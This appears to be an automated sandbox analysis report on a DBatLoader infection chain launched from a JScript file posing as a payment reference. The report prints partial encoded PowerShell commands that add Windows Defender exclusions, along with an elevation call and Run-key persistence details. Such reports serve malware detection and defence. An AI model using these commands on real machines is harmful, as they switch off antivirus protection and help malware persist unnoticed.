Source: Binary string: easinvoker.pdbGCTL source: loader.exe, 0000000E.00000003.1037350319.000000000074C000.00000004.00000020.00020000.00000000.sdmp, loader.exe, 0000000E.00000002.1106214675.0000000020D18000.00000004.00001000.00020000.00000000.sdmp, loader.exe, 0000000E.00000003.1029107436.000000007F980000.00000004.00001000.00020000.00000000.sdmp, loader.exe, 0000000E.00000003.1033797948.000000007ECA3000.00000004.00001000.00020000.00000000.sdmp, loader.exe, 0000000E.00000003.1037350319.000000000077B000.00000004.00000020.00020000.00000000.sdmp, loader.exe, 0000000E.00000003.1033797948.000000007EC90000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation
barindex
JScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.exe%22 a1:%22%22C%3A%5CUsers%5Cuser%5CDesktop%5CPayment%20reference%20no.%20-%20FT910298955674.js%22%20%2Felevate%22 a2:%22%22 a3:%22runas%22 a4:1");IShellDispatch6.ShellExecute("C:\Windows\System32\WScript.exe", ""C:\Users\user\Desktop\Payment ref", "", "runas", "1")
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: CreateTextFile("Z:\syscalls\659.js.csv");ITextStream.WriteLine(" entry:26 f:EnsureElevatedPrivileges");ITextStream.WriteLine(" exec:29 f:EnsureElevatedPrivileges");IHost.Arguments();IArguments2.Named();IWSHNamedArguments.Item();ITextStream.WriteLine(" entry:34 o: f:Exists a0:%22elevate%22");IWSHNamedArguments.Exists("elevate");IWSHNamedArguments.Item();ITextStream.WriteLine(" exit:34 o: f:Exists r:true");ITextStream.WriteLine(" exit:26 f:EnsureElevatedPrivileges r:undefined");IWshShell3._00000000();ITextStream.WriteLine(" entry:134 o: f:run a0:%22powershell%20-enc%20cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA%22 a1:0 a2");IWshShell3.Run("powershell -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbg", "0", "false");IHost.CreateObject("Scripting.FileSystemObject");IFileSystem3.CreateTextFile("Z:\syscalls\659.js.csv");ITextStream.WriteLine(" entry:26 f:EnsureElevatedPrivileges");ITextStream.WriteLine(" exec:29 f:EnsureElevatedPrivileges");IHost.Arguments();IArguments2.Named();IWSHNamedArguments.Item();ITextStream.WriteLine(" entry:34 o: f:Exists a0:%22elevate%22");IWSHNamedArguments.Exists("elevate");IWSHNamedArguments.Item();ITextStream.WriteLine(" exit:34 o: f:Exists r:true");ITextStream.WriteLine(" exit:26 f:EnsureElevatedPrivileges r:undefined");IWshShell3._00000000();ITextStream.WriteLine(" entry:134 o: f:run a0:%22powershell%20-enc%20cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA%22 a1:0 a2");IWshShell3.Run("powershell -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbg", "0", "false");IWshShell3._00000000();ITextStream.WriteLine(" exit:134 o: f:run r:0");IWshShell3._00000000();ITextStream.WriteLine(" entry:151 o: f:run a0:%22powershell%20-enc%20cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwB");IWshShell3.Run("powershell -enc cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQ", "0", "false");IHost.CreateObject("Scripting.FileSystemObject");IFileSystem3.CreateTextFile("Z:\syscalls\659.js.csv");ITextStream.WriteLine(" entry:26 f:EnsureElevatedPrivileges");ITextStream.WriteLine(" exec:29 f:EnsureElevatedPrivileges");IHost.Arguments();IArguments2.Named();IWSHNamedArguments.Item();ITextStream.WriteLine(" entry:34 o: f:Exists a0:%22elevate%22");IWSHNamedArguments.Exists("elevate");IWSHNamedArguments.Item();ITextStream.WriteLine(" exit:34 o: f:Exists r:true");ITextStream.WriteLine(" exit:26 f:EnsureElevatedPrivileges r:undefined");IWshShell3._00000000();ITextStream.WriteLine(" entry:134 o: f:run a0:%22powershell%20-enc%20cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHU
Yara detected DBatLoader
Source: Yara match File source: 14.2.loader.exe.2370c78.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.loader.exe.2ff0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.loader.exe.2370c78.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.1141302711.000000007FAE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.1072315069.0000000002370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_03003FB4 LoadLibraryW,GetProcAddress,WriteProcessMemory,FreeLibrary, 14_2_03003FB4
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFB9AB02658 push cs; iretd 5_2_00007FFB9AB026A2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFB9AB028C5 pushad ; iretd 5_2_00007FFB9AB028CA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFB9AAF09E8 push E85DD45Dh; ret 7_2_00007FFB9AAF09F9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_00007FFB9AB02B1D pushfd ; iretd 9_2_00007FFB9AB02B32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_00007FFB9AB026C3 push ss; iretd 9_2_00007FFB9AB026D2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_00007FFB9AB027CB push ebx; iretd 9_2_00007FFB9AB0280A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_00007FFB9AB02603 push cs; iretd 9_2_00007FFB9AB02642
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFB9A9DD2A5 pushad ; iretd 11_2_00007FFB9A9DD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFB9ABC2316 push 8B485F94h; iretd 11_2_00007FFB9ABC231B
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_030053B4 push 030053ECh; ret 14_2_030053E4
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_02FF3210 push eax; ret 14_2_02FF324C
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_02FFC3B2 push 02FFC80Ah; ret 14_2_02FFC802
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_02FF6368 push 02FF63AAh; ret 14_2_02FF63A2
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_02FF6366 push 02FF63AAh; ret 14_2_02FF63A2
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_030162AC push 03016317h; ret 14_2_0301630F
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_03004118 push 03004150h; ret 14_2_03004148
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_03016144 push 030161ECh; ret 14_2_030161E4
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_030161F8 push 03016288h; ret 14_2_03016280
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_02FFC004 push ecx; mov dword ptr [esp], edx 14_2_02FFC009
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_030160AC push 03016125h; ret 14_2_0301611D
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_030030C6 push 03003173h; ret 14_2_0300316B
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_030030C8 push 03003173h; ret 14_2_0300316B
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_02FFF6E0 push 02FFF756h; ret 14_2_02FFF74E
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_02FFC684 push 02FFC80Ah; ret 14_2_02FFC802
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_02FFF7EC push 02FFF839h; ret 14_2_02FFF831
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_02FFF7EB push 02FFF839h; ret 14_2_02FFF831
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_030025FC push ecx; mov dword ptr [esp], edx 14_2_030025FE
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_0300749B push 030074D4h; ret 14_2_030074CC
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_0300749C push 030074D4h; ret 14_2_030074CC
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_0300AA18 push ecx; mov dword ptr [esp], edx 14_2_0300AA1D
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_03015A78 push 03015C5Eh; ret 14_2_03015C56

Persistence and Installation Behavior
barindex
Drops PE files with a suspicious file extension
Source: C:\Users\user\AppData\Local\Temp\loader.exe File created: C:\Users\user\Links\Xdnxwtne.PIF Jump to dropped file
Contains functionality to download and launch executables
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_004062E2 ShellExecuteW,URLDownloadToFileW, 20_2_004062E2
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\loader.exe File created: C:\Users\user\Links\Xdnxwtne.PIF Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\loader.exe Jump to dropped file
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0041AC43 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 20_2_0041AC43
Source: C:\Users\user\AppData\Local\Temp\loader.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Xdnxwtne Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Xdnxwtne Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_03007914 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 14_2_03007914
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
